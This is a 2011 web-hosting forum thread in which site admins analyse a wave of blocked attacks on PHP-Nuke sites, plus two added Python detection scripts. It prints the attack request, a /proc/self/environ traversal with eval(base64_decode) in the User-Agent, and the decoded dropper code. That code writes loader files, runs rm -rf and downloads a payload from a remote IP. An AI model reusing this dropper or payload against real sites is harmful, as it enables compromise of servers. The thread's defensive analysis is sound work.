Ravens PHP Scripts: Forums
 

 

Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x
dad7732
RavenNuke(tm) Development Team


Joined: Mar 18, 2007
Posts: 1242

Posted: Tue Sep 27, 2011 6:27 am

Between 7 and 8 am CDT this morning, I'm getting literally hundreds of "Blocked" access attempts, such as:

Quote:
Created By: NukeSentinel(tm) 2.6.03
Date & Time: 2011-09-27 07:18:54 CDT GMT -0500
Blocked IP: 178.77.239.40
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: php
--------------------
Referer: none
User Agent: <?php
eval(base64_decode("..."));?>
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=Forums&file=../../../../../../../../../proc/self/environ&t=6969
Get String: name=Forums&file=../../../../../../../../../proc/self/environ&t=6969
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 178.77.239.40
Remote Port: 53817
Request Method: GET


All different IPs, but more or less the same report; the user agent changes ever so slightly per attempt.

Comments?
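
A detector for the request pattern in the report above (PHP code in the User-Agent combined with a traversal to /proc/self/environ), added here as an example; it is not part of the original post or of NukeSentinel. It assumes Apache "combined" access logs, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format is assumed; adjust LOG_RE for other layouts.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# A PHP open tag or an eval/decoder call has no business in a request header.
CODE_IN_HEADER = re.compile(r'<\?(?:php|=)|\b(?:eval|base64_decode|system|exec)\s*\(', re.I)
# Directory traversal that ends at the file exposing the request's headers.
ENVIRON_LFI = re.compile(r'(?:\.\.[/\\]){2,}.*proc/self/environ', re.I)

def deep_unquote(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding (%252e%252e%252f -> ../)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, status, findings) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    if CODE_IN_HEADER.search(m['ua']) or CODE_IN_HEADER.search(m['referer']):
        findings.append('code-in-header')
    if ENVIRON_LFI.search(deep_unquote(m['target'])):
        findings.append('environ-traversal')
    return (m['ip'], int(m['status']), findings) if findings else None

def served(hits):
    """Hits answered with 2xx were not blocked and need review first."""
    return [h for h in hits if 200 <= h[1] < 300]

# Constructed sample lines (documentation IP ranges, payload elided).
SAMPLE = [
    r'203.0.113.7 - - [27/Sep/2011:07:18:54 -0500] "GET /modules.php?name=Forums&file=../../../../../../../../../proc/self/environ&t=6969 HTTP/1.1" 403 512 "-" "<?php eval(base64_decode(\"...\"));?>"',
    r'198.51.100.9 - - [27/Sep/2011:07:19:02 -0500] "GET /modules.php?name=Forums&file=%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    r'192.0.2.44 - - [27/Sep/2011:07:20:10 -0500] "GET /modules.php?name=Forums&file=viewtopic&t=6969 HTTP/1.1" 200 8841 "-" "Mozilla/5.0 (Windows NT 6.1)"',
]

if __name__ == '__main__':
    hits = [h for h in map(classify, SAMPLE) if h]
    print(hits, served(hits))
```

The second sample line shows why the query string is decoded repeatedly before matching and why the status code is kept: an encoded traversal answered with 200 was not blocked.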
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Tue Sep 27, 2011 2:55 pm

Be happy NukeSentinel is working.
I have not seen such mass attacks on my sites.
Do you possibly have Google Plus installed in your Forums?
I don't really believe this could be the reason, but who knows.
They try to insert the loader in your writable dirs, etc.
 
dad7732
Posted: Tue Sep 27, 2011 3:20 pm

No Google Plus and I stopped counting at 400 attempts. I was interested in that User Agent string more than anything; I've never seen one like that before. And YES, thank goodness for NS.

RavensScripts
 
killing-hours
RavenNuke(tm) Development Team


Joined: Oct 01, 2010
Posts: 438
Location: Houston, Tx

Posted: Wed Sep 28, 2011 2:33 pm

That code, and other code similar to it, allows hackers to remotely infect your website after you've changed FTP passwords.

Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.

From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.

The virus works in a variety of ways.

First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml

If you have multiple accounts set up in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal them.

Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.

Third, the virus also acts as a keylogger. So for those who don't save their credentials but type them in each time, the virus can still get them.

I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.

Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.

I usually recommend either Kaspersky or Vipre (Sunbelt Software).

Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.


Your code decoded:
Code:
@ini_set('allow_url_fopen', 1);

$current_dir = preg_replace('@/$@', '', $_SERVER['DOCUMENT_ROOT'] . '/' . dirname($_SERVER['PHP_SELF']));

if (@is_writable($current_dir))
{
   createLoader($current_dir, '');
}
else
{
   $dirs = @opendir($current_dir);

   while ($dir = @readdir($dirs))
   {
      $dir = trim($dir);
      if (!$dir || preg_match('/^\.+$/', $dir) || !@is_dir("$current_dir/$dir") || !@is_writable("$current_dir/$dir")) continue;
      createLoader("$current_dir/$dir", $dir);
      break;
   }

   @closedir($dirs);
}

function createLoader($path, $dir = '')
{
   $loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php';

   $fp = fopen("$path/$loaderName", 'w');
   fwrite($fp, base64_decode(DECODED AND PUT IN NEXT CODE BLOCK));
   fclose($fp);

   if (file_exists("$path/$loaderName")) print "91746876256484****{$dir}****";
}



Second encoded part decoded:
Code:
<?php


@ini_set('allow_url_fopen', 1);

$oldDir = 'gtpaha';
$newDir = 'gtpaha';
$loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php';

@exec("rm -rf $oldDir $newDir *loaderz*");
@system("rm -rf $oldDir $newDir *loaderz*");
@rmdir($oldDir);
@rmdir($newDir);
@unlink($loaderName);

if (!@is_dir($newDir))
{
   $old_umask = @umask(0);
   @mkdir($newDir, 0777);
   @umask($old_umask);   
   @exec("chmod 777 $newDir");
}

if (@is_dir($newDir))
{
   $fp = fopen("$newDir/index.php", 'w');
   fwrite($fp, @base64_decode(file_get_contents('http://109.230.246.115/control/loader.php?password=JHGBVjkhsi8yhu65t3uyg&action=index')));
   fclose($fp);
      
   if (@file_exists("$newDir/index.php"))
   {
      print '91746876256484';
   }
   
   @unlink($loaderName);
}

?>

_________________
Money is the measurement of time - Me
"You can all go to hell…I’m going to Texas" -Davy Crockett 
View user's profile Send private message
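
A read-only sweep for the indicators named in the post above and visible in its decoded code (`loaderz.*.php`, `gifimg.php`, the `gtpaha` directory, `eval(base64_decode(` inside PHP files, world-writable directories), added here as an example; it is not code from the thread or from NukeSentinel. The function names and the temporary sample tree built by `demo()` are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Indicators taken from the thread; the webroot path is supplied by the caller.
BAD_NAMES = re.compile(r'^(loaderz\..*\.php|gifimg\.php)$', re.I)
BAD_DIRS = {'gtpaha'}
EVAL_B64 = re.compile(rb'eval\s*\(\s*(?:@\s*)?base64_decode\s*\(', re.I)

def sweep(webroot, max_bytes=2_000_000):
    """Return sorted (finding, relative_path) pairs; nothing is modified or executed."""
    findings = []
    for base, dirs, files in os.walk(webroot):
        for d in dirs:
            path = os.path.join(base, d)
            rel = os.path.relpath(path, webroot)
            if d in BAD_DIRS:
                findings.append(('dropper-dir', rel))
            # Mode bits are a proxy for "writable by the web server user".
            if stat.S_IMODE(os.stat(path).st_mode) & stat.S_IWOTH:
                findings.append(('world-writable-dir', rel))
        for f in files:
            path = os.path.join(base, f)
            rel = os.path.relpath(path, webroot)
            if BAD_NAMES.match(f):
                findings.append(('known-bad-name', rel))
            if f.lower().endswith(('.php', '.phtml', '.inc')):
                with open(path, 'rb') as fh:
                    if EVAL_B64.search(fh.read(max_bytes)):
                        findings.append(('eval-base64', rel))
    return sorted(findings)

def demo():
    """Build a constructed webroot in a temp dir and sweep it."""
    with tempfile.TemporaryDirectory() as root:
        for name, mode in (('images', 0o755), ('gtpaha', 0o777)):
            os.mkdir(os.path.join(root, name))
            os.chmod(os.path.join(root, name), mode)
        samples = {
            'index.php': b'<?php echo "ok"; ?>',
            'images/gifimg.php': b'<?php /* constructed stand-in */ ?>',
            'images/loaderz.0000.php': b'<?php /* constructed stand-in */ ?>',
            'footer.php': b'<?php eval(base64_decode("AAAA")); ?>',
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), 'wb') as fh:
                fh.write(body)
        return sweep(root)
```

Some legitimate PHP packages also use `eval(base64_decode(`, so treat an `eval-base64` hit as a file to review rather than proof of infection.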
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

Posted: Wed Sep 28, 2011 3:07 pm

So one way to stop this on a temporary basis would also be to block the script from writing to its database at the IP 109.230.246.115
Their range is 109.230.246.0 - 109.230.246.255
CIDR 109.230.240.0/20
 
killing-hours
Posted: Wed Sep 28, 2011 3:10 pm

Seems to me that it's actually originating from an infected PC. I'd start by cleaning whatever PCs I FTP "FROM" (i.e. your own PC)... then make sure the site is clean as well (i.e. check the directories etc.).

It appears that NS has stopped it...but that doesn't mean someone hasn't already gotten your FTP credentials.

***Edit

Here is the dnsstuff on it:

Quote:
inetnum: 109.230.246.0 - 109.230.246.255
netname: XSSERVER-EU
descr: xsserver.eu Dedicated Servers
remarks: +---------------------------------------------------
remarks: | We are Server Provider |
remarks: +---------------------------------------------------
remarks: | |
remarks: | These IP-Numbers are in use by our customers. |
remarks: | In case of Spam/Virus/Portscan/Attack etc |
remarks: | please send an email to *****@xsserver.eu |
remarks: | containing the IP-Number involved and timestamps. |
remarks: | |
remarks: +---------------------------------------------------
remarks: INFRA-AW
country: DE
admin-c: GB11245-RIPE
tech-c: GB11245-RIPE
status: ASSIGNED PA
mnt-by: MNT-XSSERVER
mnt-lower: MNT-XSSERVER
mnt-routes: MNT-XSSERVER
changed: ******@optimate-server.de 20110203
source: RIPE

person: Garyl Bella
address: Geldersekade 35
address: 1012 BN Amsterdam
remarks: xsserver.eu
phone: +31 20 7084082
mnt-by: MNT-XSSERVER
e-mail: *****@xsserver.eu
nic-hdl: GB11245-RIPE
changed: ******@optimate-server.de 20100815
source: RIPE

% Information related to '109.230.240.0/20AS197043'

route: 109.230.240.0/20
descr: Route
origin: AS197043
mnt-by: MNT-WHITE
mnt-routes: MNT-STAHL
changed: ******@optimate-server.de 20100526
source: RIPE


Here is the dnsstuff of the attacking ip address:
Quote:
inetnum: 178.77.239.0 - 178.77.239.255
netname: CZ-OLDANY
descr: OldanyGroup s.r.o., Prague
country: CZ
admin-c: JP4943-RIPE
tech-c: JP4943-RIPE
status: ASSIGNED PA
mnt-by: SLOANE-MNT
mnt-lower: SLOANE-MNT
changed: ******@sloane.cz 20101006
source: RIPE

person: Jaroslav Prodelal
address: OldanyGroup s.r.o.
address: Jaromirova 158/54
address: Praha 2
address: Czech Republic
e-mail: *******@oldanygroup.cz
phone: +420 222 550 020
nic-hdl: JP4943-RIPE
changed: ******@sloane.cz 20101006
source: RIPE

% Information related to '178.77.192.0/18AS29113'

route: 178.77.192.0/18
descr: Sloane Park Property Trust, a.s.
origin: AS29113
mnt-by: SLOANE-MNT
changed: ******@sloane.cz 20100421
source: RIPE
 
Guardian2003
Posted: Wed Sep 28, 2011 3:54 pm

That's not far from me :)
I'll get one of my wife's Czech teachers to contact them and let them know they have infected PCs.
 
All times are GMT - 6 Hours